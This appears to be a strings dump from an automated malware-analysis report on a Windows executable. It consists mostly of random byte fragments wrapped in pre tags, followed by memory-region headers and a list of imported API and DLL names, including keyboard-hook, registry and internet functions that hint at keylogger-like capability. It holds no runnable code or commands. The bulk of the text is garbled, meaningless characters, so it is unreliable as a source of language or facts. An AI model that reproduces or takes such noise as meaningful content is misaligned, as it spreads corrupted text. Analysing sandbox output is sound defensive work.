_bed</pre><pre>1!#*5:3<</pre><pre>%xC1i<</pre><pre>.rut_y</pre><pre>}].bn</pre><pre>fK.SW</pre><pre>T^.dm</pre><pre>.tYy}</pre><pre>709@.CO</pre><pre>\^Bo?</pre><pre>$!#,(*07></pre><pre>v}.xz/</pre><pre>-4xy}</pre><pre>it.QK</pre><pre>]#%FH</pre><pre>gf`ko.jw</pre><pre>\elji.vy</pre><pre>QSWUZfl.it</pre><pre>)61732;<</pre><pre>n.VQ \fnlio)</pre><pre>}%c{H</pre><pre>u.dGLXT</pre><pre>l36>:FI.WPPRUvy</pre><pre>.CNAg</pre><pre>0.sr(</pre><pre>Zb.ls8yz</pre><pre>sT.Zf</pre><pre>gcU%S2'</pre><pre>`.y%x</pre><pre>.ks@}{z</pre><pre>ssh!:</pre><pre>FEKV.ST</pre><pre>) -.03:;0</pre><pre>%xQAT</pre><pre>p).GB</pre><pre>{UPRFi.mk</pre><pre># ,$.OH</pre><pre>MO.JN7</pre><pre>%xFMn</pre><pre>c%Xx[</pre><pre>X%upD</pre><pre>2801547</pre><pre>.DJ',</pre><pre>!( .zO</pre><pre>_t5\Q.Wc</pre><pre>%x")46</pre><pre>e"%FJ</pre><pre>!O%sn</pre><pre>#'%D-,0</pre><pre>%$0&.)/(</pre><pre>{'#%Dn</pre><pre>#&,835>;@</pre><pre>XX%5Xi0</pre><pre>b%.OU3</pre><pre>JLRU.Ze</pre><pre>".IS$v</pre><pre>`%up'</pre><pre>V\.Yg</pre><pre>B&%XP</pre><pre>ZacVo.puJr</pre><pre>j>E.IV</pre><pre>& %/ 14=</pre><pre>(".cN</pre><pre>$ ' %, 6</pre><pre>'.IOPu</pre><pre>" %(0?@.JI</pre><pre>,.(653;></pre><pre>JSX]f.geXadko</pre><pre>.qz[d</pre><pre>D,R%c</pre><pre>.GN /6</pre><pre> .OS9</pre><pre>^.af@glvrp</pre><pre>RYec.dj</pre><pre>@DM.KQq\[</pre><pre>! @6;9=8</pre><pre>%uvw~</pre><pre>', -758:</pre><pre>.) 2621`^@</pre><pre>z(.yx</pre><pre>[_bad.lj</pre><pre>DIM.WUh_x~</pre><pre>\Xbn.qsJt3</pre><pre>Q=A.DO</pre><pre>.[g`.dc1o</pre><pre>#"(41 5:89<;</pre><pre>=D.EB</pre><pre>.nx9;8</pre><pre>RVZed.giYr~-</pre><pre>. %8,-/.*</pre><pre>HJLK.RW@S\flm</pre><pre>9# y.YD</pre><pre>W.dJ;</pre><pre>%#'&-7?.9;</pre><pre>&#*.aX</pre><pre>FCJLU.PQ</pre><pre>i.(.IK</pre><pre>,`.Ka</pre><pre>!0 -) .(</pre><pre>TXgcli.ohPupz</pre><pre>]`ackop.wy</pre><pre>8.ZP.xe</pre><pre>~y%xE)</pre><pre>_ "-/751</pre><pre>;%u4DH</pre><pre>.jqt'</pre><pre>@.EOUS</pre><pre>EAF.LT</pre><pre>crp.uy</pre><pre>GJ.IN</pre><pre>TZc.di</pre><pre>(W.jR_'</pre><pre>ÂcE&</pre><pre>a.hl9qu</pre><pre>!9=AI.SZ]</pre><pre>& /.zO(</pre><pre>.DQ(A*</pre><pre>% .GJlP}</pre><pre>|]%x`</pre><pre>il.kv</pre><pre>-c.kd</pre><pre>|FK.cq</pre><pre>N1%f!</pre><pre>$-.)0;=:</pre><pre>/, 709=;</pre><pre>.RY{zc</pre><pre>\a.eiSv&$e</pre><pre>Q]f.gc</pre><pre>3O.kG</pre><pre>i".GA</pre><pre>* /7<98`</pre><pre>.HJhV</pre><pre>d.muhqy</pre><pre>(598;?8'</pre><pre>eo.rt</pre><pre>.emhoknr</pre><pre>lO%cJ</pre><pre> /$312;@</pre><pre>%sKCP</pre><pre>%s/u?~)</pre><pre>em.qubzOf</pre><pre>.yM@bo</pre><pre>NLM.VY8akmlq</pre><pre>RPSYd.ei8s{}</pre><pre>$d$.OI@</pre><pre>'.RSo</pre><pre>!./53<>_</pre><pre>3=?D.BI</pre><pre>jF.Ic</pre><pre>R@.rl</pre><pre>'! )/.21</pre><pre>QX[d.lj(pr</pre><pre>:@FHVQSQL</pre><pre>DBEIS^c.bj3o?</pre><pre>;A.BK</pre><pre>ec.ljVnD</pre><pre>3.SO^</pre><pre>-*.OV</pre><pre>/6e%x</pre><pre>IR_.Yc</pre><pre>sv.wq</pre><pre>,-14>?=5</pre><pre>T\ef.jh</pre><pre>o$)70;.BJ</pre><pre>_.abPmrqpp_y</pre><pre>urlx{</pre><pre>|G.fa</pre><pre>.XK(v</pre><pre>as7%U=</pre><pre><F></F></pre><pre>VP^.YaXgn</pre><pre>`cjo.kh</pre><pre><",)/*7|</pre><pre>6Yp%U</pre><pre>{B.AG</pre><pre>LQ^ab.nh</pre><pre># ")7065</pre><pre> -71500.</pre><pre>R .ghIor='</pre><pre>sk.tp8wy</pre><pre>o.IGMgF<</pre><pre>h.Nf O</pre><pre>.Bx$ </pre><pre>! )0.*179</pre><pre>&,7?D.AB</pre><pre>DBusSql</pre><pre>SVZgckj.hvh</pre><pre>@.HPW</pre><pre>& #"(58:`</pre><pre>$#/:*,25</pre><pre>%Xi&_l</pre><pre>%fPNk</pre><pre>?=:GOQT.ZX</pre><pre>_%x!6</pre><pre>ýS?</pre><pre>SXcakr.wq</pre><pre>YX\.ag</pre><pre>$.OWd</pre><pre>!'#$/. )63?9;</pre><pre>.jF,1</pre><pre>$,.15<@)3</pre><pre>M.SR#_</pre><pre>\'%-.59;</pre><pre>[!.SN</pre><pre>RegOpenKeyExA</pre><pre>comdlg32.dll</pre><pre>iphlpapi.dll</pre><pre>SetViewportExtEx</pre><pre>GetViewportOrgEx</pre><pre>KERNEL32.dll</pre><pre>.ILWj}</pre><pre>SHELL32.dll</pre><pre>ScaleViewportExtEx</pre><pre>UnhookWindowsHookEx</pre><pre>GetCPInfo</pre><pre>GetKeyState</pre><pre>-N}MD</pre><pre>RegCreateKeyExA</pre><pre>.IHC6a</pre><pre>RegCloseKey</pre><pre>1, 0, 6, 6</pre><pre>(*.*)</pre><b>%original file name%.exe_208_rwx_009BC000_00002000:</b><pre>WININET.dll</pre><pre>RegDeleteKeyA</pre><pre>ADVAPI32.dll</pre><pre>InternetCrackUrlA</pre><pre>OLEAUT32.dll</pre><pre>SetWindowsHookExA</pre><pre>RegisterHotKey</pre><pre>GetViewportExtEx</pre><pre>RegOpenKeyA</pre><pre>6u!'$%f</pre><pre>RASAPI32.dll</pre><b>%original file name%.exe_208_rwx_009BF000_00001000:</b><pre>The procedure entry point %c could not be located in the dynamic link library %s</pre><pre>USER32.dll</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>GetProcessHeap</pre><pre>InternetCanonicalizeUrlA</pre><pre>OffsetViewportOrgEx</pre></pre></pre></pre></pre></pre></pre></D></pre></pre></pre></M></pre></M%f></pre></M></pre></M>